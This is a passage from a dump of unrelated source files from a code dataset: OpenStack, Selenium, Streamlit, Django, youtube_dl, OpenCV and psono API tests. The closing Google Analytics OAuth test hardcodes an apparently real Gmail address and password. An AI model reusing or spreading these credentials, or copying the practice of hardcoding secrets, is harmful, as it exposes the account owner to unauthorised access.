nova_client\nfrom cinderclient.v2 import client as cinder_client\nfrom keystoneclient.v2_0 import client as keystone_client\n\nfrom dtrove import config\nfrom .base import BaseProvider\n\n\nclass Provider(BaseProvider):\n\n def __init__(self):\n self.username = config.OS_USERNAME\n self.password = config.OS_PASSWORD\n self.project_id = config.OS_PROJECT_ID\n self.auth_url = config.OS_AUTH_URL\n self.region_name = 'IAD'\n self.endpoints = None\n self.auth_token = None\n\n def _auth(self):\n self.ks = keystone_client.Client(username=self.username,\n password=self.password,\n project_id=self.project_id,\n auth_url=self.auth_url)\n auth_ref = self.ks.auth_ref\n self.auth_token = auth_ref.auth_token\n self.endpoints = auth_ref.service_catalog.get_endpoints()\n\n def _poll(self, instance):\n while True:\n status, progress = self.update_status(instance)\n\n if status in ['active']:\n instance.progress = 100\n break\n elif status == \"error\":\n raise Exception(instance.message)\n\n time.sleep(5)\n\n def url(self, service):\n if self.endpoints is None:\n self._auth()\n\n service_endpoints = self.endpoints.get(service, [])\n for endpoint in service_endpoints:\n if endpoint.get('region', '') == self.region_name:\n return endpoint.get('publicURL')\n\n @property\n def nova(self):\n if self.auth_token is None:\n self._auth()\n return nova_client.Client(username=self.username,\n api_key=self.password,\n project_id=self.project_id,\n auth_token=self.auth_token,\n region_name=self.region_name,\n auth_url=self.auth_url,\n bypass_url=self.url('compute'))\n\n def update_status(self, instance):\n if not instance.server:\n return 'NA', 0\n obj = self.nova.servers.get(instance.server)\n\n status = getattr(obj, 'status', 'none').lower()\n progress = getattr(obj, 'progress', None) or 0\n\n if status == \"error\":\n instance.message = obj.fault['message']\n\n instance.server_status = status\n instance.progress = progress\n if not instance.addr:\n instance.addr = obj.accessIPv4\n instance.save()\n\n return status, progress\n\n def create_key(self, key):\n try:\n existing = self.nova.keypairs.get(key.name)\n 
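The `Cosine` head above computes a scaled cosine similarity by expanding both operands to `(batch, out_features, in_features)`. Since cosine similarity of row vectors is just a matmul of L2-normalized rows, the same layer can be written without the expansion and without the hardcoded `.cuda()` calls. A device-agnostic sketch of that equivalent form:

```python
# Equivalent scaled-cosine classifier: normalize input rows and weight
# rows, then F.linear (x @ W.T) yields the pairwise cosine similarities.
# `scale` plays the role of self.t above.
import torch
import torch.nn as nn
import torch.nn.functional as F

class CosineLinear(nn.Module):
    def __init__(self, in_features, out_features, scale=10.0):
        super().__init__()
        self.weight = nn.Parameter(torch.empty(out_features, in_features))
        # Same uniform(-stdv, stdv) init as Cosine.reset_parameters above.
        stdv = 1.0 / in_features ** 0.5
        nn.init.uniform_(self.weight, -stdv, stdv)
        self.scale = scale

    def forward(self, x):
        # Normalizing both operands turns the matmul into cosine similarity.
        return self.scale * F.linear(F.normalize(x, dim=1),
                                     F.normalize(self.weight, dim=1))

if __name__ == "__main__":
    layer = CosineLinear(512, 10)
    logits = layer(torch.randn(4, 512))
    print(logits.shape)        # torch.Size([4, 10])
    print(logits.abs().max())  # bounded by the scale (10.0)
```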
except:\n self.nova.keypairs.create(name=key.name, public_key=key.public)\n\n def create(self, instance):\n cluster = instance.cluster\n datastore = cluster.datastore\n image = datastore.image\n key = instance.key\n # TODO: don't hard code this\n flavor = '3'\n # First create a keypair to log in with\n self.create_key(key)\n server = self.nova.servers.create(name=instance.name,\n image=image,\n flavor=flavor,\n key_name=key.name)\n time.sleep(3)\n server = self.nova.servers.get(server.id)\n instance.server = server.id\n instance.addr = server.accessIPv4\n instance.save()\n self._poll(instance)\n","sub_path":"dtrove/providers/openstack.py","file_name":"openstack.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519101138","text":"from selenium import webdriver\r\n\r\nclass ExOfMethod():\r\n def Method(self):\r\n chrome_path = \"C:\\\\Users\\\\soumya.patil\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37-32\\\\Drivers\\\\chromedriver.exe\"\r\n \r\n driver = webdriver.Chrome(chrome_path)\r\n \r\n #To maximize window use a maximiza method ,it is method because it uses ()\r\n driver.maximize_window()\r\n \r\n #get the base url using get method\r\n driver.get(\"https://stackoverflow.com/jobs\")\r\n \r\n #get the title using title\r\n t = driver.title\r\n print(\"The title of the page is :- \",t)\r\n \r\n #get current url\r\n CU = driver.current_url\r\n print(\"Current Url :- \",CU)\r\n \r\n #browser refresh\r\n driver.refresh()\r\n print(\"browser is refreshed\")\r\n \r\n #another way to refresh\r\n driver.get(driver.current_url)\r\n print(\"browser is again refreshed\")\r\n \r\n #go back\r\n driver.back()\r\n print(\"Go back one step in browser history\")\r\n \r\n #go forword\r\n driver.forward()\r\n print(\"Go forword one step in browser history\")\r\n \r\n #page source which means prints all the html code of a page\r\n #pageSourse = driver.page_source\r\n #print(pageSourse.encode(\"utf-8\"))\r\n \r\n \r\n driver.quit()\r\n \r\nEM = ExOfMethod()\r\nEM.Method() ","sub_path":"SeleniumTest/ExampleOfMethodNProperty.py","file_name":"ExampleOfMethodNProperty.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"359311726","text":"import io\nimport streamlit as st\nimport numpy as np\nimport wave\n\nst.title('Audio test')\n\n\ndef note(freq, length, amp, rate):\n t = np.linspace(0, length, length * rate)\n data = np.sin( 2 * np.pi * freq * t) * amp\n return data.astype(np.int16)\n\nfrequency = 440 # hertz\nnchannels = 1\nsampwidth = 2\nsampling_rate = 44100\nduration = 89 # Max size, given the bitrate and sample width\ncomptype = 'NONE'\ncompname = 'not compressed'\namplitude = 10000\nnframes = duration * sampling_rate\n\nx = st.text('Making wave...')\nsine_wave = note(frequency, duration, amplitude, sampling_rate)\n\nf = wave.open('sound.wav', 'w')\nf.setparams((nchannels, sampwidth, int(sampling_rate), nframes, comptype, compname))\n\nx.text('Converting wave...')\nf.writeframes(sine_wave)\n\nf.close()\n\nwith io.open('sound.wav', 'rb') as f:\n x.text('Sending wave...')\n x.audio(f)\n","sub_path":"examples/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"580291183","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport requests\n\nfrom 
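The sine-tone helper in the Streamlit snippet above can be made slightly more robust: sampling on a half-open interval keeps the frequency exact, and a context manager guarantees the WAV header is finalized even if a write fails. A self-contained variant (the 440 Hz, one-second parameters are just demo values):

```python
import wave
import numpy as np

def sine_tone(freq_hz, seconds, amplitude, rate):
    # endpoint=False keeps the sample spacing at exactly 1/rate, so the
    # tone stays at freq_hz instead of being very slightly stretched.
    t = np.linspace(0, seconds, int(seconds * rate), endpoint=False)
    return (amplitude * np.sin(2 * np.pi * freq_hz * t)).astype(np.int16)

samples = sine_tone(440, 1.0, 10000, 44100)

# The context manager closes the file and finalizes the RIFF header
# even if writeframes() raises.
with wave.open("sound.wav", "wb") as f:
    f.setnchannels(1)   # mono
    f.setsampwidth(2)   # int16 -> 2 bytes per sample
    f.setframerate(44100)
    f.writeframes(samples.tobytes())
```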
django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Url(models.Model):\n user = models.ForeignKey(User, related_name='urls', on_delete=models.CASCADE, null=True, blank=True)\n url = models.URLField(null=True, blank=True)\n status = models.IntegerField(null=True, blank=True)\n interval = models.IntegerField(default=30)\n active = models.BooleanField(default=True)\n created = models.DateTimeField(auto_now_add=True, null=True)\n updated = models.DateTimeField(auto_now=True, null=True)\n\n @property\n def get_status(self):\n if self.status not in [None, 0]:\n return f'{self.status}'\n return ''\n\n @property\n def get_status_color(self):\n if not self.get_status:\n return '#fc0909'\n else:\n return '#3efc05'\n\n def sync(self):\n if not self.active:\n print('not active')\n return\n\n try:\n r = requests.get(self.url, timeout=5)\n print(f'req: {self.url}')\n self.status = r.status_code\n self.save()\n except requests.exceptions.ConnectTimeout:\n print('ConnectTimeout')\n\n def __str__(self):\n verbose_name = self.url[:30]\n return f'[{self.get_status}] <{self.user.username}> <{verbose_name}>'\n","sub_path":"url_monitor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96261713","text":"from __future__ import unicode_literals\nfrom django.conf import settings\nimport youtube_dl, subprocess, PIL\nfrom PIL import Image\nfrom io import BytesIO\nimport datetime, json, re, logging, math, base64, random, string, os\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\n\n\nmp3bitrates = [32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320]\n\nclass YoutubeStuff():\n\turl = \"\"\n\tdef __init__(self,url):\n\t\tself.url = url\n\tdef getInfo(self):\n\t\tydl_opts = {\n\t\t\t\"forcejson\":True,\n\t\t\t\"simulate\":True,\n\t\t\t\"quiet\":True\n\t\t}\n\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\tourinfo = ydl.extract_info(self.url,download=False)\n\t\treturn ourinfo\n\tdef getVideo(self,data,uformat,abit,folder,index,total):\n\t\tclass MyLogger(object):\n\t\t def debug(self, msg):\n\t\t print(msg)\n\n\t\t def warning(self, msg):\n\t\t print(msg)\n\n\t\t def error(self, msg):\n\t\t print(msg)\n\t\tydl_base = {\n\t\t\t\"restrictfilenames\":True,\n\t\t\t\"outtmpl\":settings.MEDIA_ROOT+\"/\"+folder+\"/%(title)s.%(ext)s\",\n\t\t\t\"logger\":MyLogger(),\n\t\t}\n\t\tif re.match(r'mkv|mp4|webm', uformat) is None:\n\t\t\tabit = min(mp3bitrates, key=lambda x:abs(x-abit))\n\t\t\tcombinedstr = str(data[1])\n\t\t\tydl_add = {\n\t\t\t\t\"format\":combinedstr,\n\t\t\t\t'extractaudio' : True,\n\t \t\t'audioformat' : uformat,\n\t \t\t'postprocessors': [{\n\t\t\t 'key': 'FFmpegExtractAudio',\n\t\t\t 'preferredcodec': uformat,\n\t\t\t 'preferredquality': str(abit),\n\t\t\t }]\n\t\t\t}\n\t\telse:\n\t\t\tcombinedstr = \"+\".join(data)\n\t\t\tydl_add = {\n\t\t\t\t\"format\":combinedstr,\n\t\t\t\t\"merge_output_format\":uformat\n\t\t\t}\n\t\tydl_opts = {}\n\t\tydl_opts.update(ydl_base)\n\t\tydl_opts.update(ydl_add)\n\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\tthing = ydl.download([self.url])\n\nclass SaveStuff():\n\tdef __init__(self,img,filename):\n\t\tself.img = img\n\t\tself.filename = filename\n\tdef saveImage(self):\n\t\tdataUrlPattern = re.compile('data:image/(png|jpeg);base64,(.*)$')\n\t\tImageData = self.img\n\t\tImageData = 
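`Url.sync()` above only catches `requests.exceptions.ConnectTimeout`, so read timeouts and connection errors would propagate out of the task. A small sketch of the broader catch using the library's common base exception; treating failures as status `0` (which `get_status` above already renders as down) is an assumption for illustration:

```python
# Defensive variant of the health check in Url.sync(): every requests
# failure (DNS error, refused connection, read timeout, ...) derives
# from requests.exceptions.RequestException, so one handler covers them.
import requests

def check_url(url, timeout=5):
    try:
        response = requests.get(url, timeout=timeout)
        return response.status_code
    except requests.exceptions.RequestException as exc:
        # Covers ConnectTimeout, ReadTimeout, ConnectionError, etc.
        print(f"check failed for {url}: {exc}")
        return 0  # rendered as "down" by get_status above

if __name__ == "__main__":
    print(check_url("https://example.com"))
```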
dataUrlPattern.match(ImageData).group(2)\n\t\tprint(ImageData[0:256],len(ImageData))\n\t\timage_path = \"images/\"+self.filename\n\t\tfull_image_path = os.path.join(settings.MEDIA_ROOT, image_path)\n\t\tif os.path.isfile(full_image_path):\n\t\t\treturn image_path\n\t\twith open(full_image_path,\"wb\")as fh:\n\t\t\ttry:\n\t\t\t\tfh.write(base64.decodestring(bytes(ImageData)))\n\t\t\texcept:\n\t\t\t\tfh.write(base64.decodestring(bytes(ImageData,\"utf-8\")))\n\t\treturn image_path\n#No, I'm too fucking lazy at 5:37 AM to make it dataURL's I'm just going to save the damn fucking things because I'm tired of having to deal with it.\nclass DataImgCompress():\n\tdef __init__(self,imgdata):\n\t\tself.imgdata = imgdata\n\tdef tmpSaveImg(self):\n\t\tprint(os.getcwd())\n\t\trandomstr = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(24))+\".jpg\"\n\t\timage_path = settings.MEDIA_ROOT+\"/tmpimages/\"+randomstr\n\t\timg = Image.open(self.imgdata)\n\t\timg.save(image_path,quality=90,subsampling = 0)\n\t\treturn \"/media/tmpimages/\"+randomstr\n\n\n","sub_path":"ytdownload/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"212457011","text":"from operator import attrgetter\nimport os, codecs\n\nclass ErrorCode:\n def __init__(self, number=0, desc='', desc2='', er_files=[]):\n self.number = number\n self.desc = desc\n self.desc2 = desc2\n self.files = [er_files]\n def adding(self, er_files):\n #self.files += ', {}'.format(er_files)\n er_files = er_files[0]\n self.files.append(er_files)\n #self.files = self.files.split\n def __repr__(self):\n return('{} -> {} {} {}\\n'.format(self.number, self.desc, self.desc2, self.files))\n\ndef error_matrix():\n error_codes = open(\"error_codes.txt\", \"r\")\n error_array = []\n for lane in error_codes:\n lane = lane.strip().split(sep='#')\n error = ErrorCode(lane[0], lane[1], lane[2], lane[3])\n error_array.append(error)\n error_codes.close()\n #print(error_array[0])\n return error_array\n\ndef error_check(error_array):\n for error in error_array:\n #print(error[0])\n pass\n\ndef error_where(error_array):\n file = open(\"error_where.txt\", \"w+\")\n file_errors = open(\"error_list.csv\", \"w+\")\n first_lane = 'Error number Description Where\\n-----------------------------------------------------------\\n'\n file.write(first_lane)\n for error in error_array:\n file.write('{} -> {}\\n'.format(error.number, error.desc))\n file_errors.write('{}#{}#{}\\n'.format(error.number, error.desc, error.desc2))\n for x in range(len(error.files)):\n file.write(' {}. 
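`base64.decodestring()` used in `saveImage()` above was deprecated long ago and removed in Python 3.9; `base64.b64decode()` is the portable replacement and accepts `str` payloads directly, so the bytes/utf-8 fallback is unnecessary. A compact sketch of the same data-URL handling (the payload below is a stand-in string, not a real image):

```python
import base64
import re

DATA_URL_RE = re.compile(r"data:image/(png|jpeg);base64,(.*)$")

def decode_data_url(data_url):
    match = DATA_URL_RE.match(data_url)
    if match is None:
        raise ValueError("not a base64 image data URL")
    # b64decode accepts str or bytes; no try/except dance needed.
    return match.group(1), base64.b64decode(match.group(2))

if __name__ == "__main__":
    # Stand-in payload just to exercise the round trip.
    payload = "data:image/png;base64," + base64.b64encode(b"not really a png").decode()
    kind, raw = decode_data_url(payload)
    print(kind, len(raw), "bytes")  # png 16 bytes
```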
{}\\n'.format(x+1, error.files[x]))\n file.close()\n file_errors.close()\n\ndef save(error_array):\n file = open(\"sorted.txt\", \"w+\")\n first_lane = 'Error number Description Where\\n-----------------------------------------------------------\\n'\n file.write(first_lane)\n for error in error_array:\n file.write('{} -> {} {}\\n'.format(error.number, error.desc, error.files))\n file.close()\n\n\ndef error_code_link(error_array):\n linked = ErrorCode()\n linked_array = []\n x = -1\n for e in error_array:\n if x == -1:\n linked = e\n x = 0\n #print(linked.number)\n continue\n if (e.number != linked.number or e.desc != linked.desc):\n linked_array.append(linked)\n #print('{} {} {} {}'.format(linked.number, e.number, e.number != linked.number, e.desc != linked.desc))\n #print('[{}]\\n[{}]'.format(e.desc, linked.desc))\n linked = e\n #x += 1\n continue\n if e.number == linked.number or e.desc == linked.desc:\n linked.adding(e.files)\n continue\n return linked_array\n\n\n\nerror_array = error_matrix()\nsorted_e = sorted(sorted(error_array, key=attrgetter('desc')), key=attrgetter('number'))\nsave(sorted_e)\nlinked_e = error_code_link(sorted_e)\n#print(linked_e)\nerror_where(linked_e)","sub_path":"Error_search/where_are_errors.py","file_name":"where_are_errors.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357998736","text":"book = {}\r\nbook ['tom'] = {\r\n 'name': 'tom',\r\n 'address': 'red, ny',\r\n 'phone': 3848372\r\n}\r\n\r\nbook ['bob'] = {\r\n 'name': 'bob',\r\n 'address':'green, ny',\r\n 'phone':353432\r\n}\r\n\r\nimport json\r\ns = json.dumps(book)\r\nprint(s)\r\nwith open('book.txt', 'w') as f:\r\n f.write(s)\r\n","sub_path":"json_example1.py","file_name":"json_example1.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240806345","text":"import cv2\nimport os\nimport numpy as np\nfrom imutils.object_detection import non_max_suppression\n\n# define the path to the face detector\nFACE_DETECTOR_PATH = \"{base_path}/cascades/haarcascade_frontalface_alt.xml\".format(\n base_path=os.path.abspath(os.path.dirname(__file__)))\n\nimagePath = 'images/kids.png'\n\n# load the image and convert\nimage = cv2.imread(imagePath)\n\n\n# convert the image to grayscale, load the face cascade detector,\n# and detect faces in the image\ncimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ndetector = cv2.CascadeClassifier(FACE_DETECTOR_PATH)\nrects = detector.detectMultiScale(cimage, scaleFactor=1.1, minNeighbors=5,\n minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n# draw the final bounding boxes\nfor (xA, yA, xB, yB) in rects:\n cv2.rectangle(cimage, (xA, yA), (xB, yB), (0, 255, 0), 2)\n rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\n pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)\n\n # draw the final bounding boxes\n for (xA, yA, xB, yB) in pick:\n cv2.rectangle(cimage, (xA, yA), (xB, yB), (0, 255, 0), 2)\n\ncv2.imshow(\"After NMS\", cimage)\ncv2.waitKey(0)\n\n","sub_path":"src/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"542479675","text":"from django.urls import reverse\nfrom django.contrib.auth.hashers import make_password\nfrom django.conf import settings\n\nfrom rest_framework import status\nfrom .base import APITestCaseExtended\nfrom 
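The Haar-cascade script that closes above draws boxes and rebuilds `rects` inside the drawing loop; the usual flow is convert once, suppress once, then draw the survivors. A sketch of that ordering (`cv2.data.haarcascades` as the cascade location is an assumption of the pip `opencv-python` layout):

```python
# Convert detections to corner boxes once, run one NMS pass, then draw.
import cv2
import numpy as np
from imutils.object_detection import non_max_suppression

def detect_faces(gray, detector):
    rects = detector.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5,
                                      minSize=(30, 30),
                                      flags=cv2.CASCADE_SCALE_IMAGE)
    if len(rects) == 0:
        return []
    # (x, y, w, h) -> (x1, y1, x2, y2), then a single suppression pass.
    boxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
    return non_max_suppression(boxes, probs=None, overlapThresh=0.65)

if __name__ == "__main__":
    detector = cv2.CascadeClassifier(
        cv2.data.haarcascades + "haarcascade_frontalface_alt.xml")
    image = cv2.imread("images/kids.png")  # path from the script above
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    for (x1, y1, x2, y2) in detect_faces(gray, detector):
        cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 2)
```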
restapi import models\n\nimport random\nimport string\nimport binascii\nimport os\n\n\nclass AcceptMembershipTest(APITestCaseExtended):\n \"\"\"\n Test to accept a membership (POST)\n \"\"\"\n def setUp(self):\n self.test_email = \"test@example.com\"\n self.test_email_bcrypt = \"a\"\n self.test_username = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_password = \"myPassword\"\n self.test_authkey = \"c55066421a559f76d8ed5227622e9f95a0c67df15220e40d7bc98a8a598124fa15373ac553ef3ee27c7\" \\\n \"123d6be058e6d43cc71c1b666bdecaf33b734c8583a93\"\n self.test_public_key = \"5706a5648debec63e86714c8c489f08aee39477487d1b3f39b0bbb05dbd2c649\"\n self.test_secret_key = \"a7d028388e9d80f2679c236ebb2d0fedc5b7b0a28b393f6a20cc8f6be636aa71\"\n self.test_secret_key_enc = \"77cde8ff6a5bbead93588fdcd0d6346bb57224b55a49c0f8a22a807bf6414e4d82ff60711422\" \\\n \"996e4a26de599982d531eef3098c9a531a05f75878ac0739571d6a242e6bf68c2c28eadf1011\" \\\n \"571a48eb\"\n self.test_secret_key_nonce = \"f580cc9900ce7ae8b6f7d2bab4627e9e689dca0f13a53e3c\"\n self.test_private_key = \"d636f7cc20384475bdc30c3ede98f719ee09d1fd4709276103772dd9479f353c\"\n self.test_private_key_enc = \"abddebec9d20cecf7d1cab95ad6c6394db3826856bf21c2c6af9954e9816c2239f5df697e52\" \\\n \"d60785eb1136803407b69729c38bb50eefdd2d24f2fa0f104990eee001866ba83704cf4f576\" \\\n \"a74b9b2452\"\n self.test_private_key_nonce = \"4298a9ab3d9d5d8643dfd4445adc30301b565ab650497fb9\"\n\n self.test_user_obj = models.User.objects.create(\n username=self.test_username,\n email=self.test_email,\n email_bcrypt=self.test_email_bcrypt,\n authkey=make_password(self.test_authkey),\n public_key=self.test_public_key,\n private_key=self.test_private_key_enc,\n private_key_nonce=self.test_private_key_nonce,\n secret_key=self.test_secret_key_enc,\n secret_key_nonce=self.test_secret_key_nonce,\n user_sauce='90272aaf01a2d525223f192aca069e7f5661b3a0f1b1a91f9b16d493fdf15295',\n is_email_active=True\n )\n\n self.test_email2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@example.com'\n self.test_email_bcrypt2 = \"b\"\n self.test_username2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_authkey2 = binascii.hexlify(os.urandom(settings.AUTH_KEY_LENGTH_BYTES)).decode()\n self.test_public_key2 = binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode()\n self.test_private_key2 = binascii.hexlify(os.urandom(settings.USER_PRIVATE_KEY_LENGTH_BYTES)).decode()\n self.test_private_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_secret_key2 = binascii.hexlify(os.urandom(settings.USER_SECRET_KEY_LENGTH_BYTES)).decode()\n self.test_secret_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_user_sauce2 = 'a67fef1ff29eb8f866feaccad336fc6311fa4c71bc183b14c8fceff7416add99'\n\n self.test_user_obj2 = models.User.objects.create(\n username=self.test_username2,\n email=self.test_email2,\n email_bcrypt=self.test_email_bcrypt2,\n authkey=make_password(self.test_authkey2),\n public_key=self.test_public_key2,\n private_key=self.test_private_key2,\n private_key_nonce=self.test_private_key_nonce2,\n secret_key=self.test_secret_key2,\n secret_key_nonce=self.test_secret_key_nonce2,\n user_sauce=self.test_user_sauce2,\n is_email_active=True\n )\n\n self.test_group_obj = models.Group.objects.create(\n name = 'Test Group 1',\n public_key = 'a123',\n )\n\n self.test_membership_obj = 
models.User_Group_Membership.objects.create(\n user = self.test_user_obj,\n group = self.test_group_obj,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = True,\n accepted = True,\n )\n\n self.test_group_obj3 = models.Group.objects.create(\n name = 'Test Group 3',\n public_key = 'a123',\n )\n\n self.test_membership_obj3 = models.User_Group_Membership.objects.create(\n user = self.test_user_obj,\n group = self.test_group_obj3,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = True,\n accepted = False,\n )\n\n self.test_group_obj4 = models.Group.objects.create(\n name = 'Test Group 4',\n public_key = 'a123',\n )\n\n self.test_membership_obj4 = models.User_Group_Membership.objects.create(\n user = self.test_user_obj2,\n group = self.test_group_obj4,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = True,\n accepted = False,\n )\n\n self.test_group_obj5 = models.Group.objects.create(\n name = 'Test Group 5',\n public_key = 'a123',\n )\n\n self.test_membership_obj5 = models.User_Group_Membership.objects.create(\n user = self.test_user_obj,\n group = self.test_group_obj5,\n creator = self.test_user_obj,\n secret_key = 'secret_key',\n secret_key_nonce = 'secret_key_nonce',\n secret_key_type = 'symmetric',\n private_key = 'private_key',\n private_key_nonce = 'private_key_nonce',\n private_key_type = 'symmetric',\n group_admin = False,\n accepted = None,\n )\n\n def test_read_accept_membership(self):\n \"\"\"\n Tests GET method on membership_accept\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {}\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.get(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n\n def test_accept_failure_already_accepted_share(self):\n \"\"\"\n Tests to accept a membership that has already been accepted\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_failure_with_no_membership_id(self):\n \"\"\"\n Tests to accept a membership without a membership id\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_failure_with_already_declined_membership(self):\n \"\"\"\n Tests to accept a membership with an already declined membership\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj3.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def 
test_accept_failure_of_membership_that_belongs_to_other_user(self):\n \"\"\"\n Tests to accept a membership that belongs to another user\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj4.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_accept_success(self):\n \"\"\"\n Tests to accept a membership with a not yet accepted membership\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {\n 'membership_id': self.test_membership_obj5.id,\n }\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.post(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_accept_membership(self):\n \"\"\"\n Tests PUT method on membership_accept\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {}\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.put(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n\n def test_delete_accept_membership(self):\n \"\"\"\n Tests DELETE method on membership_accept\n \"\"\"\n\n url = reverse('membership_accept')\n\n data = {}\n\n self.client.force_authenticate(user=self.test_user_obj)\n response = self.client.delete(url, data)\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)","sub_path":"psono/restapi/tests/membership_accept.py","file_name":"membership_accept.py","file_ext":"py","file_size_in_byte":10247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"541188777","text":"import pandas as pd\n\n\nclass AdWordsAPIAccountInsightsMapper:\n\n @classmethod\n def map(cls, fields, df):\n df = df.where(df != ' --', None)\n df = df.where(pd.notnull(df), None)\n\n for field in fields:\n if field.conversion_function is not None:\n df[field.name] = df[field.name].apply(field.conversion_function)\n return df\n","sub_path":"GoogleTuring/Infrastructure/Mappings/AdWordsAPIInsightsMapper.py","file_name":"AdWordsAPIInsightsMapper.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"354604632","text":"# Copyright (c) 2015 App Annie Inc. 
All rights reserved.\nfrom nose.plugins.attrib import attr\n\nfrom tests import factories\nfrom tests.qa.base import CoreBaseSeleniumTestCase\nfrom tests.qa.pages.user_admin.login_page import LoginPage\nfrom webanalytics import models\nfrom tests.qa.pages.advana.connection_page.ga_connection_details_page import GooglePermissionPage, \\\n GAConnectionDetailsPage\nfrom tests.qa.pages.analytics.connection_page.connections_page import ConnectionsPage\nfrom webanalytics.advana.in_app_analytics.ga.account_management import revoke_oauth_permission\nfrom webanalytics.whitelist import set_email_list\nfrom tests.qa.constants import constants\n\n\nclass GAOauthTest(CoreBaseSeleniumTestCase):\n def setUp(self):\n CoreBaseSeleniumTestCase.setUp(self)\n self.user = factories.create_user()\n login_page = LoginPage(self.selenium)\n login_page.login(self.user.username, factories.USER_PASSWORD) # test_password\n login_page.wait_for_login_ready()\n\n self.ga_user = 'appanniegatest@gmail.com'\n self.ga_pwd = 'appannie4u1' # warning, maybe get \"sign-in attempt from this device\" issue in ci env\n self.connection_page = ConnectionsPage(self.selenium)\n # whitelist\n set_email_list('Google Analytics', ['*@appannie.com'])\n\n @attr(constants.NOT_READY)\n def c40134_add_ga_account_smoke_test(self):\n self.connection_page.goto()\n self.connection_page.add_new_ga_connection()\n current_url = 